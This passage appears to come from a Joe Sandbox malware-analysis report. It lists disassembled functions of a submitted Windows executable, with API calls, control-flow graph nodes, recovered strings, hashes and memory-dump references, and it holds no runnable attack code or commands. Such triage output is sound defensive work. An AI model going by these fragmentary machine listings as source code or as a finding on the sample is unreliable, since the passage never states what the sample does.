                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 00E1CC36
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00E1CC46
                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,00E4A472), ref: 00E1CC54
                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E1CC7F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                                    • String ID: %s.%d.tmp$<br>$<$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$
                                                                                                    • API String ID: 986293930-3467919732
                                                                                                    • Opcode ID: e6382eceeab4432bf1ec0a727591c2698125d7803b4893555b14edf701fb68c3
                                                                                                    • Instruction ID: 174875bd2b4fa52e9465c3a2eb61da419254b370e73f1040b4652b104cbce154
                                                                                                    • Opcode Fuzzy Hash: e6382eceeab4432bf1ec0a727591c2698125d7803b4893555b14edf701fb68c3
                                                                                                    • Instruction Fuzzy Hash: F5E161B2904218AADF24DBA0DC85EEE77BCAB04350F5454A6F649F3040EB749FC88F61
                                                                                                    Function 00E0DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E0DA70
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E0DA91
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E0DAAC
                                                                                                      • Part of subcall function 00E0C29A: _wcslen.LIBCMT ref: 00E0C2A2
                                                                                                      • Part of subcall function 00E105DA: _wcslen.LIBCMT ref: 00E105E0
                                                                                                      • Part of subcall function 00E11B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00E0BAE9,00000000,?,?,?,00010420), ref: 00E11BA0
                                                                                                    • _wcslen.LIBCMT ref: 00E0DDE9
                                                                                                    • __fprintf_l.LIBCMT ref: 00E0DF1C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9
                                                                                                    • API String ID: 557298264-1836506137
                                                                                                    • Opcode ID: e0e8fdb46b9d45f59144368f1bcd081bbf4815daa15395de1214700c12aea523
                                                                                                    • Instruction ID: d86cfd8f441eb592a5afdf14c1bd464a941d6f68106b57c61b17ef50095e0d71
                                                                                                    • Opcode Fuzzy Hash: e0e8fdb46b9d45f59144368f1bcd081bbf4815daa15395de1214700c12aea523
                                                                                                    • Instruction Fuzzy Hash: BE32DF71900218EBDB24EFA8CC46AEA77A5FF58304F40256AF905B72D1EBB19DC5CB50
                                                                                                    Function 00E1D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00E1B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E1B579
                                                                                                      • Part of subcall function 00E1B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1B58A
                                                                                                      • Part of subcall function 00E1B568: IsDialogMessageW.USER32(00010420,?), ref: 00E1B59E
                                                                                                      • Part of subcall function 00E1B568: TranslateMessage.USER32(?), ref: 00E1B5AC
                                                                                                      • Part of subcall function 00E1B568: DispatchMessageW.USER32(?), ref: 00E1B5B6
                                                                                                    • GetDlgItem.USER32(00000068,00E5FCB8), ref: 00E1D4E8
                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00E1AF07,00000001,?,?,00E1B7B9,00E3506C,00E5FCB8,00E5FCB8,00001000,00000000,00000000), ref: 00E1D510
                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E1D51B
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E335F4), ref: 00E1D529
                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E1D53F
                                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00E1D559
                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E1D59D
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00E1D5AB
                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E1D5BA
                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E1D5E1
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E343F4), ref: 00E1D5F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                    • String ID: \
                                                                                                    • API String ID: 3569833718-2967466578
                                                                                                    • Opcode ID: 848af1b2c500c614caf317192cfb3eafa4d6ab7cfd7be63c24d6a09b1df22c45
                                                                                                    • Instruction ID: d41994c5f5864de44355647c49674c7dd04e267fb192968ccf793a0d6efece4e
                                                                                                    • Opcode Fuzzy Hash: 848af1b2c500c614caf317192cfb3eafa4d6ab7cfd7be63c24d6a09b1df22c45
                                                                                                    • Instruction Fuzzy Hash: 6731BE75545342AFE301DF21AC4AFAB7FACEB82748F00050CFA51A61A1DBA49A0DC776
                                                                                                    Function 00E1D78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 838 e1d78f-e1d7a7 call e1ec50 841 e1d9e8-e1d9f0 838->841 842 e1d7ad-e1d7b9 call e23e13 838->842 842->841 845 e1d7bf-e1d7e7 call e1fff0 842->845 848 e1d7f1-e1d7ff 845->848 849 e1d7e9 845->849 850 e1d801-e1d804 848->850 851 e1d812-e1d818 848->851 849->848 852 e1d808-e1d80e 850->852 853 e1d85b-e1d85e 851->853 854 e1d810 852->854 855 e1d837-e1d844 852->855 853->852 856 e1d860-e1d866 853->856 857 e1d822-e1d82c 854->857 858 e1d9c0-e1d9c2 855->858 859 e1d84a-e1d84e 855->859 860 e1d868-e1d86b 856->860 861 e1d86d-e1d86f 856->861 864 e1d81a-e1d820 857->864 865 e1d82e 857->865 867 e1d9c6 858->867 866 e1d854-e1d859 859->866 859->867 860->861 862 e1d882-e1d898 call e0b92d 860->862 861->862 863 e1d871-e1d878 861->863 874 e1d8b1-e1d8bc call e0a231 862->874 875 e1d89a-e1d8a7 call e11fbb 862->875 863->862 868 e1d87a 863->868 864->857 870 e1d830-e1d833 864->870 865->855 866->853 871 e1d9cf 867->871 868->862 870->855 873 e1d9d6-e1d9d8 871->873 876 e1d9e7 873->876 877 e1d9da-e1d9dc 873->877 884 e1d8d9-e1d8dd 874->884 885 e1d8be-e1d8d5 call e0b6c4 874->885 875->874 883 e1d8a9 875->883 876->841 877->876 880 e1d9de-e1d9e1 ShowWindow 877->880 880->876 883->874 887 e1d8e4-e1d8e6 884->887 885->884 887->876 889 e1d8ec-e1d8f9 887->889 890 e1d8fb-e1d902 889->890 891 e1d90c-e1d90e 889->891 890->891 892 e1d904-e1d90a 890->892 893 e1d910-e1d919 891->893 894 e1d925-e1d944 call e1dc3b 891->894 892->891 895 e1d97b-e1d987 CloseHandle 892->895 893->894 902 e1d91b-e1d923 ShowWindow 893->902 894->895 907 e1d946-e1d94e 894->907 896 e1d989-e1d996 call e11fbb 895->896 897 e1d998-e1d9a6 895->897 896->871 896->897 897->873 901 e1d9a8-e1d9aa 897->901 901->873 905 e1d9ac-e1d9b2 901->905 902->894 905->873 908 e1d9b4-e1d9be 905->908 907->895 909 e1d950-e1d961 GetExitCodeProcess 907->909 908->873 909->895 910 e1d963-e1d96d 909->910 911 e1d974 910->911 912 e1d96f 910->912 911->895 912->911
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00E1D7AE
                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00E1D8DE
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00E1D91D
                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00E1D959
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E1D97F
                                                                                                    • ShowWindow.USER32(?,00000001), ref: 00E1D9E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                    • String ID: .exe$.inf$PDu<$h$r
                                                                                                    • API String ID: 36480843-2155249188
                                                                                                    • Opcode ID: d1c689806e9340dfaab7e21e2b3f24c9e803e809b9f763c97d173073a5d7721d
                                                                                                    • Instruction ID: 24e49e1b0a86268e15319ed6e346fff098394038396f978b47fbe7b3f8ae9db7
                                                                                                    • Opcode Fuzzy Hash: d1c689806e9340dfaab7e21e2b3f24c9e803e809b9f763c97d173073a5d7721d
                                                                                                    • Instruction Fuzzy Hash: 6C51F37150C384AEDB309B25AC44BEBBBE5AF82748F04281DF5C1B7191E7B489C8CB52
                                                                                                    Function 00E23B72 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 913 e23b72-e23b7c 914 e23bee-e23bf1 913->914 915 e23bf3 914->915 916 e23b7e-e23b8c 914->916 917 e23bf5-e23bf9 915->917 918 e23b95-e23bb1 LoadLibraryExW 916->918 919 e23b8e-e23b91 916->919 920 e23bb3-e23bbc GetLastError 918->920 921 e23bfa-e23c00 918->921 922 e23b93 919->922 923 e23c09-e23c0b 919->923 925 e23be6-e23be9 920->925 926 e23bbe-e23bd3 call e26088 920->926 921->923 927 e23c02-e23c03 FreeLibrary 921->927 924 e23beb 922->924 923->917 924->914 925->924 926->925 930 e23bd5-e23be4 LoadLibraryExW 926->930 927->923 930->921 930->925
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00E23C35,00000000,00000FA0,00E62088,00000000,?,00E23D60,00000004,InitializeCriticalSectionEx,00E36394,InitializeCriticalSectionEx,00000000), ref: 00E23C03
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID: api-ms-$c*
                                                                                                    • API String ID: 3664257935-2985010064
                                                                                                    • Opcode ID: 0d9f8d5ee2dcdb2aee1b3455730df25a26e521f43338f41f09980432bd155159
                                                                                                    • Instruction ID: ea440ac220cf7c247cea12ec38892b15383c6eddf07f7765c667c4b2d6995e4b
                                                                                                    • Opcode Fuzzy Hash: 0d9f8d5ee2dcdb2aee1b3455730df25a26e521f43338f41f09980432bd155159
                                                                                                    • Instruction Fuzzy Hash: D2110636A04234ABCB328F79AC45B5A7BA49F01774F211251F911FB2A0E778EF048ED0
                                                                                                    Function 00E2A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 931 e2a95b-e2a974 932 e2a976-e2a986 call e2ef4c 931->932 933 e2a98a-e2a98f 931->933 932->933 940 e2a988 932->940 935 e2a991-e2a999 933->935 936 e2a99c-e2a9c0 MultiByteToWideChar 933->936 935->936 938 e2ab53-e2ab66 call e1fbbc 936->938 939 e2a9c6-e2a9d2 936->939 941 e2aa26 939->941 942 e2a9d4-e2a9e5 939->942 940->933 944 e2aa28-e2aa2a 941->944 945 e2a9e7-e2a9f6 call e32010 942->945 946 e2aa04-e2aa15 call e28e06 942->946 948 e2aa30-e2aa43 MultiByteToWideChar 944->948 949 e2ab48 944->949 945->949 958 e2a9fc-e2aa02 945->958 946->949 959 e2aa1b 946->959 948->949 952 e2aa49-e2aa5b call e2af6c 948->952 953 e2ab4a-e2ab51 call e2abc3 949->953 961 e2aa60-e2aa64 952->961 953->938 960 e2aa21-e2aa24 958->960 959->960 960->944 961->949 963 e2aa6a-e2aa71 961->963 964 e2aa73-e2aa78 963->964 965 e2aaab-e2aab7 963->965 964->953 966 e2aa7e-e2aa80 964->966 967 e2ab03 965->967 968 e2aab9-e2aaca 965->968 966->949 971 e2aa86-e2aaa0 call e2af6c 966->971 972 e2ab05-e2ab07 967->972 969 e2aae5-e2aaf6 call e28e06 968->969 970 e2aacc-e2aadb call e32010 968->970 976 e2ab41-e2ab47 call e2abc3 969->976 985 e2aaf8 969->985 970->976 983 e2aadd-e2aae3 970->983 971->953 986 e2aaa6 971->986 972->976 977 e2ab09-e2ab22 call e2af6c 972->977 976->949 977->976 989 e2ab24-e2ab2b 977->989 988 e2aafe-e2ab01 983->988 985->988 986->949 988->972 990 e2ab67-e2ab6d 989->990 991 e2ab2d-e2ab2e 989->991 992 e2ab2f-e2ab3f WideCharToMultiByte 990->992 991->992 992->976 993 e2ab6f-e2ab76 call e2abc3 992->993 993->953
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E257FB,00E257FB,?,?,?,00E2ABAC,00000001,00000001,2DE85006), ref: 00E2A9B5
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E2ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00E2AA3B
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E2AB35
                                                                                                    • __freea.LIBCMT ref: 00E2AB42
                                                                                                      • Part of subcall function 00E28E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E24286,?,0000015D,?,?,?,?,00E25762,000000FF,00000000,?,?), ref: 00E28E38
                                                                                                    • __freea.LIBCMT ref: 00E2AB4B
                                                                                                    • __freea.LIBCMT ref: 00E2AB70
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1414292761-0
                                                                                                    • Opcode ID: 8b42f28a184ab8ab90929db59847b6b7e8c7d6c80958eec645a5d0ba3dc3020e
                                                                                                    • Instruction ID: 11804753f79b56228be2b9eba47ddd64b006349c941f5e3f26146c356864b010
                                                                                                    • Opcode Fuzzy Hash: 8b42f28a184ab8ab90929db59847b6b7e8c7d6c80958eec645a5d0ba3dc3020e
                                                                                                    • Instruction Fuzzy Hash: DB51E172A00226AFEB258F64EC41EABB7AAEF44714F19563DFC04F6140EB34DC40C692
                                                                                                    Function 00E1AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00E1081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E10836
                                                                                                      • Part of subcall function 00E1081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E0F2D8,Crypt32.dll,00000000,00E0F35C,?,?,00E0F33E,?,?,?), ref: 00E10858
                                                                                                    • OleInitialize.OLE32(00000000), ref: 00E1AC2F
                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E1AC66
                                                                                                    • SHGetMalloc.SHELL32(00E48438), ref: 00E1AC70
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                    • String ID: riched20.dll$3Ro
                                                                                                    • API String ID: 3498096277-3613677438
                                                                                                    • Opcode ID: 7df5e8fa5e7d4f1b736d3e7fa6aad9b5f656d917f72431fcb11837a73f3f3705
                                                                                                    • Instruction ID: 9a2d09de80af7efe55b610a717bfe7bd5e1cfad1ba95ebc5463bba046017a92d
                                                                                                    • Opcode Fuzzy Hash: 7df5e8fa5e7d4f1b736d3e7fa6aad9b5f656d917f72431fcb11837a73f3f3705
                                                                                                    • Instruction Fuzzy Hash: 3DF0FFB1900209AFCB50AFAAD9499DFFFFCEF94740F004156E415B2241DBB456498BA1
                                                                                                    Function 00E098E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1000 e098e0-e09901 call e1ec50 1003 e09903-e09906 1000->1003 1004 e0990c 1000->1004 1003->1004 1005 e09908-e0990a 1003->1005 1006 e0990e-e0991f 1004->1006 1005->1006 1007 e09921 1006->1007 1008 e09927-e09931 1006->1008 1007->1008 1009 e09933 1008->1009 1010 e09936-e09943 call e06edb 1008->1010 1009->1010 1013 e09945 1010->1013 1014 e0994b-e0996a CreateFileW 1010->1014 1013->1014 1015 e099bb-e099bf 1014->1015 1016 e0996c-e0998e GetLastError call e0bb03 1014->1016 1017 e099c3-e099c6 1015->1017 1020 e099c8-e099cd 1016->1020 1022 e09990-e099b3 CreateFileW GetLastError 1016->1022 1017->1020 1021 e099d9-e099de 1017->1021 1020->1021 1023 e099cf 1020->1023 1024 e099e0-e099e3 1021->1024 1025 e099ff-e09a10 1021->1025 1022->1017 1026 e099b5-e099b9 1022->1026 1023->1021 1024->1025 1027 e099e5-e099f9 SetFileTime 1024->1027 1028 e09a12-e09a2a call e10602 1025->1028 1029 e09a2e-e09a39 1025->1029 1026->1017 1027->1025 1028->1029
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00E07760,?,00000005,?,00000011), ref: 00E0995F
                                                                                                    • GetLastError.KERNEL32(?,?,00E07760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E0996C
                                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00E07760,?,00000005,?), ref: 00E099A2
                                                                                                    • GetLastError.KERNEL32(?,?,00E07760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E099AA
                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00E07760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E099F9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
